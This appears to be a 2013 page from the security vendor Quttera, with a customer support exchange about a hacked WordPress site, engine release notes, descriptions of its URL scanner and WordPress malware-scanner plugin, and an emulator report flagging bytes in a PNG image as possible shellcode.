Hi there, Thank you very much for replying. Yes, this is the malicious code I am worried about. I believe it was caused by a plugin that has since been removed from the WordPress repository. I have blogged about the entire ordeal here: http://www.dnexpert.com/2013/03/16/website-hacked-removing-the-google-analytics-malicious-wordpress-plugin/ I hope you don't mind me referencing your website and facebook page. Could you please do one more scan as I believe the malicious code was in my cached files which I have subsequently removed. I have also removed the offending WordPress plugin. Thank you very much. Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 6:35 PM
Subject: Re: remove from suspicious database
Hi Mirza, Your website scanned again and found clean. Full report could be found here http://quttera.com/detailed_report/www.dnexpert.com Thank you very much for contacting us. Safe browsing and stay clean! Michael, Quttera support team.






Monday, March 18, 2013

Release 2.7.0

Malicious content detection engine - release 2.7.0

Main fixes:

  • Investigation report enhanced by dump of binary threats. 
  • Instead of threat disassembly provide pure dump of memory "\0xAA\0xBB....\0xFD" 
  • JavaScript threat dump enhaced by dumping an entire HTML script tag containing detected threat Fixed several compilation issues

CLI-based URL scanner for Windows

What is Quttera URL Scanner

Quttera URL Scanner is a command-line based URL scanner designed especially for URL investigation and detection of malicious files and suspicious scripts hidden in legitimate web content. This application is a freeware and it is very useful for web-sites owners as it could be used as a tool for periodic rescan of managed web site in order to detect injected hidden suspicious and malicious content before it harms their business. Quttera URL Scanner provided as a command-line interface (CLI) utility which core is the specially crafted, patent pending Quttera investigation engine. Quttera URL Scanner recursively downloads content of the URL and then investigates it using Quttera investigation engine. Current version utilizes an open source web crawler wget which is distributed under GNU GPL V2 license.

Technology description

Quttera investigation engine is a not-signature based, behavior analysis investigation engine capable to recognize and detect software vulnerability exploits, shell-codes, malicious JavaScript scripts and malicious executable code hidden in legitimate web content like HTML pages, movies, images, PDF files and others.

Investigation engine main parts:

  • X86 emulator for detection of shell-codes and sensible, malicious sequences of executable CPU instructions
  • JavaScript emulator for detection of malicious JavaScript code and HTML pages
  • PDF reader emulator for detection of malicious PDF files
For downloads and more info visit here: command-line based URL scanner

Web Malware Scanner plugin for Word Press

Introduction

Quttera malicious content detection technology directly from your Word Press dashboard! Keep your blog malware-free with Quttera Web Malware Scanner. Detect malware, exploits, JavaScript code obfuscation and other suspicious activity. The plugin scans the content of your blog for web-based malware in its various formats. The data is investigated on the remote servers by the Quttera malicious content detection engines. No files will be changed on your web-site. It adressess the malware hidden behind HTML, Javascript, Dynamic HTML, AJAX, Flash, PDF, or other valid programming languages and formats. It will help you to identify malicious code injection, malicious code obfuscation, auto-generated malicious web content, JavaScript code obfuscation, exploits and much more. Avoid your blog visitors from being infected by malware and protect your reputation. Keep your blog safe and protect visitors from being infected by malware with Quttera Web Malware Scanner plugin. Search your blog content for:
  • malicious code
  • vulnerability exploits(shell-codes)
  • JavaScript obfuscation techniques
  • hidden iframes
  • unconditional re-directions
  • any potentially suspicious activity

Features

Quttera Web Malware Scanner is based on Quttera investigation engine. Its core is a platform with multiple non-signature based detection and analytic units which allow to identify JavaScript based attacks, security vulnerability exploits, JavaScript obfuscation techniques and JavaScript packers that are used to hide malicious content from signature/pattern identification methods. Quttera Web Malware Scanner detects:
  • Security vulnerability exploits referencing system internals(x86 architecture)
  • Security vulnerability exploits referencing process internals(x86 architecture)
  • Sensible sequences of CPU instructions inside text and binary files(x86 architecture)
  • Hidden Java-script code generated during emulation of the original script or web page
  • Suspicious Java-script containing code obfuscation or injection of hidden Java-script
  • Hidden HTML elements generated during emulation of the original script or web page
  • PDF files containing embedded malicious PE files
  • PDF files containing hidden suspicious actions
  • PDF files containing hidden suspicious elements
  • PDF files containing Java-script code obfuscation
  • Malformed PDF files
  • Encrypted PDF files
  • Unconditional redirections to external URLs

Download and Install

Download page: WordPress Malware Scanner plugin See "Installing Plugins" and "Manual Plugin Installation" sections at http://codex.wordpress.org/Managing_Plugins

How it works?

Quttera Web Malware Scanner plugin interacts with Quttera's Web Investigation Server (WIS) using HTTP interface and enforce reinvestigation of specified domain. Both the hosting server name and Quttera investigation server name could be cofigured by user and are not limited by default values. Currently we have only one investigation server so please do not change it. Web-site investigation is peformed asynchroniously and does not require from user to stay on the same page and wait for investigation result. Once "Scan my website" button is pressed, the investigation request sent to Quttera investigation server. If user already investigated his website in last 24 hours, Quttera investigation server will retun the latest result. If last investigation request occured before 24 hours, the website will be investigated once again.

Detected suspicious payload/shellcode into linuxfr.org/images/sections/46.png

Quttera investigation engine statistics of the detected payload

Offset of the detected payload: 0

Payload emulation counters:

WRITES_TO_PROCESS_STACK_MEMORY15
BUFFER_INSIDE_WRITES_COUNT0
REFERENCES_TO_PROCESS_INTERNALS0
BUFFER_OUTSIDE_WRITES_COUNT6
FAR_JUMPS_COUNT0
FULLY_INITIALIZED_INSTRUCTIONS92
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES0
PROC_CALLS_INSIDE_INV_BUFFER0
BUFFER_OUTSIDE_READS_COUNT3
UNDEFINED_DIRECT_CALLS0
JUMPS_INSIDE_INV_BUFFER3
CORRECTLY_PARSED_INSTRUCTIONS100
MEMORY_MODIFYING_MATH_INSTRUCTIONS0
BUFFER_INSIDE_READS_COUNT0
SYSTEM_CALLS_COUNT0
UNRECOGNIZED_CALL_TARGETS0
REFERENCES_TO_PROCESS_IMPORTS0
CORRECT_PROCEDURES_CALLS0
EIP_RETRIEVAL_INSTRUCTIONS0
JUMPS_TO_PROCESS_INTERNALS0
EXECUTED_ARITHMETIC_INSTRUCTIONS36
CALLS_TARGETED_IMPORTS_SECTION0
UNRECOGNIZED_JUMP_TARGETS0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS72
REFERENCES_TO_PROCESS_EXPORTS0
EXECUTES_BITS_OPERATING_INSTRUCTIONS0
IMMEDIATE_OPERANDS_INSTRUCTIONS0
INDIRECT_BUFFER_REFERENCES21
MAX_WRITTEN_MEMORY_BLOCK0
CORRECTLY_EXECUTED_INSTRUCTIONS100
READS_FROM_PROCESS_STACK_MEMORY15
CALLS_TARGETED_EXPORTS_SECTION0


Detection disassembly:

MOV DS:[EAX + 0x4E] (0x0000004E),EDX (0x00000000) ;random write instruction
INC EDI (0x00000000)
OR EAX (0x00000000),0x000A1A0A
ADD DS:[EAX] (0x000A1A0A),AL (0x0A) ;random write instruction [suspicious memory write instruction]
OR EAX (0x000A1A0A),0x52444849
ADD DS:[EAX] (0x524E5A4B),AL (0x4B) ;random write instruction [suspicious memory write instruction]
ADD DS:[ECX] (0x00000000),AL (0x4B)
ADD DS:[EAX] (0x524E5A4B),AL (0x4B) ;random write instruction [suspicious memory write instruction]
XOR DS:[EAX] (0x524E5A4B),ECX (0x00000000) ;random write instruction
ADD EAX (0x524E5A4B),DS:[EAX] (0x524E5A4B) ;random read instruction
ADD DS:[EAX] (0x524E5A4B),AL (0x4B) ;random write instruction [suspicious memory write instruction]
MOV DL (0x00),0x0B
XOR AL (0x4B),0xB6
ADD DS:[EAX] (0x524E5AFD),AL (0xFD) ;random write instruction [suspicious memory write instruction]
ADD DS:[ECX] (0x00000000),AL (0xFD)
JNB 0x52 ;random read instruction
INC EDI (0x00000001)
INC EDX (0x0000000B)
ADD DS:[ESI + 0xE91CCE] (0x00E91CCE),CH (0x00) ;random write instruction
ADD DS:[EAX] (0x524E5AFD),AL (0xFD) ;random write instruction [suspicious memory write instruction]
OR DS:[EAX + 0x48] (0x524E5B45),ESI (0x00000000) ;random write instruction
POP ECX (0x00000000)
JNB 0x00
ADD DS:[EBX] (0x00000000),CL (0x00)
ADC DS:[EAX] (0x524E5AFD),EAX (0x524E5AFD) ;random write instruction
ADD DS:[EBX] (0x00000000),CL (0x00)
ADC DS:[ECX] (0x00000000),EAX (0x524E5AFD)
JNLE 0x64 ;random read instruction
INC EAX (0x524E5AFD)
INC ECX (0x00000000)
INC ECX (0x00000001)
INC ECX (0x00000002)
INC ESP (0x0983652F)
INC ESP (0x09836530)
INC ESP (0x09836531)
INC EBP (0x00000000)
INC EBP (0x00000001)
INC EBP (0x00000002)
INC ESI (0x00000000)
INC ESI (0x00000001)
INC ESI (0x00000002)
INC EDI (0x00000002)
INC EDI (0x00000003)
INC EDI (0x00000004)
DEC EAX (0x524E5AFE)
DEC EAX (0x524E5AFD)
DEC EAX (0x524E5AFC)
DEC EDX (0x0000000C)
DEC EDX (0x0000000B)
DEC EDX (0x0000000A)
DEC EBX (0x00000000)
DEC EBX (0xFFFFFFFF)
DEC EBX (0xFFFFFFFE)
DEC ESP (0x09836532)
DEC ESP (0x09836531)
DEC ESP (0x09836530)
DEC EBP (0x00000003)
DEC EBP (0x00000002)
DEC EBP (0x00000001)
DEC ESI (0x00000003)
DEC ESI (0x00000002)
DEC ESI (0x00000001)
DEC EDI (0x00000005)
DEC EDI (0x00000004)
DEC EDI (0x00000003)
PUSH EAX (0x524E5AFB)
PUSH EAX (0x524E5AFB)
PUSH EAX (0x524E5AFB)
PUSH ECX (0x00000003)
PUSH ECX (0x00000003)
PUSH ECX (0x00000003)
PUSH EDX (0x00000009)
PUSH EDX (0x00000009)
PUSH EDX (0x00000009)
PUSH EBX (0xFFFFFFFD)
PUSH EBX (0xFFFFFFFD)
PUSH EBX (0xFFFFFFFD)
PUSH ESP (0x098364FF)
PUSH ESP (0x098364FB)
PUSH ESP (0x098364F7)
PUSH EBP (0x00000000)
PUSH EBP (0x00000000)
PUSH EBP (0x00000000)
PUSH ESI (0x00000000)
PUSH ESI (0x00000000)
PUSH ESI (0x00000000)
POP EAX (0x524E5AFB)
POP EAX (0x00000000)
POP EAX (0x00000000)
POP EDX (0x00000009)
POP EDX (0x00000000)
POP EDX (0x00000000)
POP EBX (0xFFFFFFFD)
POP EBX (0x098364F7)
POP EBX (0x098364FB)
POP ESP (0x098364FF)
POP ESP (0xFFFFFFFD)
POP ESP (0x00000000)
POP EBP (0x00000000)
POP EBP (0x00000000)